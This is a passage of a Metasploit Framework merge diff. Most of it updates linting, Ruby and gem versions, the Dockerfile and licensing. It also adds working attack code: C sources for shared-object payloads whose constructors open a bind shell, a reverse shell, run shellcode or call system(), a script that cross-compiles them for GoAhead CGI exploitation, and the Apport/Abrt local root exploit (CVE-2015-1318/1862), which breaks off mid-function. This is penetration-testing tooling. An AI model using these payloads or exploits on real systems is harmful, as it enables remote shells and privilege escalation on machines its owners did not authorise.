Land #9868 , fix post/osx/capture/keylog_recorder

Land #9994 , tidy tests, add ms17_010_psexec
Land #9878 , Add MSF module for EDB 6768, Mantis <= v1.1.3 Post-auth RCE
2018-05-10 09:27:29 -07:00 · 2018-05-09 17:48:54 -07:00 · 2018-05-09 17:48:53 -07:00 · 2018-05-09 17:48:53 -07:00 · 2018-05-09 17:48:53 -07:00 · 2018-05-09 17:48:53 -07:00
642 changed files with 32567 additions and 4699 deletions
@@ -4,6 +4,7 @@
 docker-compose*.yml
 docker/
 !docker/msfconsole.rc
+!docker/entrypoint.sh
 README.md
 .git/
 .github/
@@ -17,6 +17,10 @@ Metrics/ClassLength:
  Exclude:
    - 'modules/**/*'

+Style/ClassAndModuleChildren:
+  Enabled: false
+  Description: 'Forced nesting is harmful for grepping and general code comprehension'
+
 Metrics/AbcSize:
  Enabled: false
  Description: 'This is often a red-herring'
@@ -29,6 +33,10 @@ Metrics/PerceivedComplexity:
  Enabled: false
  Description: 'This is often a red-herring'

+Style/TernaryParentheses:
+  Enabled: false
+  Description: 'This outright produces bugs'
+
 Style/FrozenStringLiteralComment:
  Enabled: false
  Description: 'We cannot support this yet without a lot of things breaking'
@@ -37,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Style/NumericPredicate:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
@@ -92,9 +104,10 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/SpaceInsideBrackets:
-  Enabled: false
-  Description: 'Until module template are final, most modules will fail this.'
+Layout/AlignParameters:
+  Enabled: true
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

 Style/StringLiterals:
  Enabled: false
@@ -104,6 +117,10 @@ Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'

+Style/IfUnlessModifier:
+  Enabled: false
+  Description: 'This style might save a couple of lines, but often makes code less clear'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -1 +1 @@
-2.4.2
+2.5.1
@@ -11,9 +11,9 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.2'
-  - '2.3.5'
-  - '2.4.2'
+  - '2.3.7'
+  - '2.4.4'
+  - '2.5.1'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -36,8 +36,13 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Don't** use the default merge messages when merging from other branches.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+ If you do not send a PR from a topic branch, the history of your PR will be
+ lost as soon as you update your own master branch. See
+ https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
+ this in action.
+

 ### Pull Requests

@@ -1,9 +1,8 @@
-FROM ruby:2.4.2-alpine
+FROM ruby:2.5.1-alpine3.7
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 ENV APP_HOME /usr/src/metasploit-framework/
-ENV MSF_USER msf
 ENV NMAP_PRIVILEGED=""
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
@@ -15,19 +14,23 @@ COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb

 RUN apk update && \
    apk add \
+      bash \
      sqlite-libs \
      nmap \
      nmap-scripts \
      nmap-nselibs \
      postgresql-libs \
+      python \
+      python3 \
      ncurses \
      libcap \
+      su-exec \
    && apk add --virtual .ruby-builddeps \
      autoconf \
      bison \
      build-base \
      ruby-dev \
-      openssl-dev \
+      libressl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -45,13 +48,16 @@ RUN apk update && \
    && apk del .ruby-builddeps \
    && rm -rf /var/cache/apk/*

-RUN adduser -g msfconsole -D $MSF_USER
-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

-USER $MSF_USER
-
 ADD ./ $APP_HOME

+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
+ENTRYPOINT ["docker/entrypoint.sh"]
+
 CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
@@ -19,10 +19,8 @@ group :development do
  # module documentation
  gem 'octokit'
  # Metasploit::Aggregator external session proxy
-  gem 'metasploit-aggregator' if [
-    'x86-mingw32', 'x64-mingw32',
-    'x86_64-linux', 'x86-linux',
-    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  # disabled during 2.5 transition until aggregator is available
+  #gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.16.32)
+    metasploit-framework (4.16.56)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -16,11 +16,11 @@ PATH
      json
      metasm
      metasploit-concern
-      metasploit-credential
+      metasploit-credential (< 3.0.0)
      metasploit-model
-      metasploit-payloads (= 1.3.25)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.3)
+      metasploit-payloads (= 1.3.34)
+      metasploit_data_models (< 3.0.0)
+      metasploit_payloads-mettle (= 0.3.8)
      mqtt
      msgpack
      nessus_rest
@@ -38,7 +38,6 @@ PATH
      pg (= 0.20.0)
      railties
      rb-readline
-      rbnacl (< 5.0.0)
      recog
      redcarpet
      rex-arch
@@ -59,7 +58,8 @@ PATH
      rex-struct2
      rex-text
      rex-zip
-      ruby_smb
+      ruby-macho
+      ruby_smb (= 0.0.18)
      rubyntlm
      rubyzip
      sqlite3
@@ -73,7 +73,7 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.0.2)
+    Ascii85 (1.0.3)
    actionpack (4.2.10)
      actionview (= 4.2.10)
      activesupport (= 4.2.10)
@@ -103,20 +103,20 @@ GEM
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.5.0)
+    arel-helpers (2.6.1)
      activerecord (>= 3.1.0, < 6)
-    backports (3.11.0)
+    backports (3.11.3)
    bcrypt (3.1.11)
    bcrypt_pbkdf (1.0.0)
-    bindata (2.4.1)
+    bindata (2.4.3)
    bit-struct (0.16)
    builder (3.2.3)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
-    crass (1.0.3)
+    crass (1.0.4)
    diff-lcs (1.3)
    dnsruby (1.60.2)
-    docile (1.1.5)
+    docile (1.3.0)
    erubis (2.7.0)
    factory_girl (4.9.0)
      activesupport (>= 3.0.0)
@@ -125,53 +125,28 @@ GEM
      railties (>= 3.0.0)
    faker (1.8.7)
      i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.15.0)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
    filesize (0.1.1)
-    fivemat (1.3.5)
-    google-protobuf (3.5.1)
-    googleapis-common-protos-types (1.0.1)
-      google-protobuf (~> 3.0)
-    googleauth (0.6.2)
-      faraday (~> 0.12)
-      jwt (>= 1.4, < 3.0)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.8.3)
-      google-protobuf (~> 3.1)
-      googleapis-common-protos-types (~> 1.0.0)
-      googleauth (>= 0.5.1, < 0.7)
+    fivemat (1.3.6)
    hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.1.0)
-    jwt (2.1.0)
-    little-plugger (1.1.4)
-    logging (2.2.2)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.2)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memoist (0.16.0)
    metasm (1.0.3)
-    metasploit-aggregator (1.0.0)
-      grpc
-      rex-arch
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (2.0.14)
      metasploit-concern
      metasploit-model
-      metasploit_data_models
+      metasploit_data_models (< 3.0.0)
      pg
      railties
      rex-socket
@@ -181,41 +156,39 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.25)
-    metasploit_data_models (2.0.15)
+    metasploit-payloads (1.3.34)
+    metasploit_data_models (2.0.16)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg
+      pg (= 0.20.0)
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.3)
+    metasploit_payloads-mettle (0.3.8)
    method_source (0.9.0)
    mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.2)
-    multi_json (1.13.1)
+    msgpack (1.2.4)
    multipart-post (2.0.0)
    nessus_rest (0.1.6)
    net-ssh (4.2.0)
    network_interface (0.0.2)
-    nexpose (7.1.1)
-    nokogiri (1.8.1)
+    nexpose (7.2.0)
+    nokogiri (1.8.2)
      mini_portile2 (~> 2.3.0)
    octokit (4.8.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.1)
    openvas-omp (0.0.4)
-    os (0.9.6)
    packetfu (1.1.13)
      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pdf-reader (2.1.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
@@ -223,15 +196,15 @@ GEM
      ttfunk
    pg (0.20.0)
    pg_array_parser (0.0.9)
-    postgres_ext (3.0.0)
-      activerecord (>= 4.0.0)
+    postgres_ext (3.0.1)
+      activerecord (~> 4.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
    pry (0.11.3)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.1)
-    rack (1.6.8)
+    public_suffix (3.0.2)
+    rack (1.6.10)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
@@ -240,18 +213,16 @@ GEM
      activesupport (>= 4.2.0, < 5.0)
      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.3)
-      loofah (~> 2.0)
+    rails-html-sanitizer (1.0.4)
+      loofah (~> 2.2, >= 2.2.2)
    railties (4.2.10)
      actionpack (= 4.2.10)
      activesupport (= 4.2.10)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.3.0)
+    rake (12.3.1)
    rb-readline (0.5.5)
-    rbnacl (4.0.2)
-      ffi
-    recog (2.1.17)
+    recog (2.1.19)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -262,12 +233,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.12)
+    rex-core (0.1.13)
    rex-encoder (0.1.4)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.16)
+    rex-exploitation (0.1.19)
      jsobfu
      metasm
      rex-arch
@@ -290,14 +261,14 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.10)
+    rex-socket (0.1.14)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.16)
+    rex-text (0.2.20)
    rex-zip (0.1.3)
      rex-text
    rkelly-remix (0.0.7)
@@ -323,7 +294,8 @@ GEM
      rspec-support (~> 3.7.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
+    ruby-macho (1.1.0)
    ruby-rc4 (0.1.5)
    ruby_smb (0.0.18)
      bindata
@@ -334,13 +306,8 @@ GEM
    sawyer (0.8.1)
      addressable (>= 2.3.5, < 2.6)
      faraday (~> 0.8, < 1.0)
-    signet (0.8.1)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (>= 1.5, < 3.0)
-      multi_json (~> 1.10)
-    simplecov (0.15.1)
-      docile (~> 1.1.0)
+    simplecov (0.16.1)
+      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.2)
@@ -350,9 +317,9 @@ GEM
    thread_safe (0.3.6)
    timecop (0.9.1)
    ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2017.3)
+    tzinfo-data (1.2018.4)
      tzinfo (>= 1.0.0)
    windows_error (0.1.2)
    xdr (2.0.0)
@@ -367,7 +334,6 @@ PLATFORMS
 DEPENDENCIES
  factory_girl_rails
  fivemat
-  metasploit-aggregator
  metasploit-framework!
  octokit
  pry
@@ -75,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1

+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby
@@ -599,6 +603,54 @@ License: Artistic
 DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
 ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+License: Apache
+ Version 1.1, 2000
+ Modifications by CORE Security Technologies
+ .
+ Copyright (c) 2000 The Apache Software Foundation.  All rights
+ reserved.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+ .
+ 3. The end-user documentation included with the redistribution,
+    if any, must include the following acknowledgment:
+       "This product includes software developed by
+        CORE Security Technologies (http://www.coresecurity.com/)."
+    Alternately, this acknowledgment may appear in the software itself,
+    if and wherever such third-party acknowledgments normally appear.
+ .
+ 4. The names "Impacket" and "CORE Security Technologies" must
+    not be used to endorse or promote products derived from this
+    software without prior written permission. For written
+    permission, please contact oss@coresecurity.com.
+ .
+ 5. Products derived from this software may not be called "Impacket",
+    nor may "Impacket" appear in their name, without prior written
+    permission of CORE Security Technologies.
+ .
+ THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+ WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+ USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+
 License: Apache
 Version 2.0, January 2004
 http://www.apache.org/licenses/
@@ -96,7 +96,7 @@ rex-rop_builder, 0.1.3, "New BSD"
 rex-socket, 0.1.8, "New BSD"
 rex-sslscan, 0.1.4, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.15, "New BSD"
+rex-text, 0.2.17, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 robots, 0.10.1, MIT
@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so
@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}
@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}
@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}
@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi
@@ -0,0 +1,143 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <err.h>
+#include <syslog.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+ 
+//
+// Apport/Abrt Vulnerability Demo Exploit.
+//
+//  Apport: CVE-2015-1318
+//  Abrt:   CVE-2015-1862
+// 
+//   -- taviso@cmpxchg8b.com, April 2015.
+//
+// $ gcc -static newpid.c
+// $ ./a.out
+// uid=0(root) gid=0(root) groups=0(root)
+// sh-4.3# exit
+// exit
+//
+// Hint: To get libc.a,
+//  yum install glibc-static or apt-get install libc6-dev
+//
+
+//
+// Modified for Metasploit. Original exploit:
+// - https://www.exploit-db.com/exploits/36746/
+//
+ 
+int main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper;
+    pid_t init;
+    pid_t subprocess;
+    unsigned i;
+
+    // If we're root, then we've convinced the core handler to run us,
+    // so create a setuid root executable that can be used outside the chroot.
+    if (getuid() == 0) {
+        if (chown("sh", 0, 0) != 0)
+            exit(EXIT_FAILURE);
+ 
+        if (chmod("sh", 04755) != 0)
+            exit(EXIT_FAILURE);
+ 
+        return EXIT_SUCCESS;
+    }
+ 
+    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
+    // a shell and cleanup.
+    if (setuid(0) == 0) {
+        system("id");
+        system("rm -rf exploit");
+        execlp("sh", "sh", NULL);
+ 
+        // Something went wrong.
+        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
+    }
+ 
+    // It looks like the exploit hasn't run yet, so create a chroot.
+    if (mkdir("exploit", 0755) != 0
+     || mkdir("exploit/usr", 0755) != 0
+     || mkdir("exploit/usr/share", 0755) != 0
+     || mkdir("exploit/usr/share/apport", 0755) != 0
+     || mkdir("exploit/usr/libexec", 0755) != 0) {
+        err(EXIT_FAILURE, "failed to create chroot directory");
+    }
+ 
+    // Create links to the exploit locations we need.
+    if (link(*argv, "exploit/sh") != 0
+     || link(*argv, "exploit/usr/share/apport/apport") != 0        // Ubuntu
+     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) {  // Fedora
+        err(EXIT_FAILURE, "failed to create required hard links");
+    }
+ 
+    // Create a subprocess so we don't enter the new namespace.
+    if ((wrapper = fork()) == 0) {
+ 
+        // In the child process, create a new pid and user ns. The pid
+        // namespace is only needed on Ubuntu, because they check for %P != %p
+        // in their core handler. On Fedora, just a user ns is sufficient.
+        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
+            err(EXIT_FAILURE, "failed to create new namespace");
+ 
+        // Create a process in the new namespace.
+        if ((init = fork()) == 0) {
+ 
+            // Init (pid 1) signal handling is special, so make a subprocess to
+            // handle the traps.
+            if ((subprocess = fork()) == 0) {
+                // Change /proc/self/root, which we can do as we're privileged
+                // within the new namepace.
+                if (chroot("exploit") != 0) {
+                    err(EXIT_FAILURE, "chroot didnt work");
+                }
+ 
+                // Now trap to get the core handler invoked.
+                __builtin_trap();
+ 
+                // Shouldn't happen, unless user is ptracing us or something.
+                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
+            }
+ 
+            // If the subprocess exited with an abnormal signal, then everything worked.
+            if (waitpid(subprocess, &status, 0) == subprocess)    
+                return WIFSIGNALED(status)
+                        ? EXIT_SUCCESS
+                        : EXIT_FAILURE;
+ 
+            // Something didn't work.
+            return EXIT_FAILURE;
+        }
+ 
+        // The new namespace didn't work.
+        if (waitpid(init, &status, 0) == init)
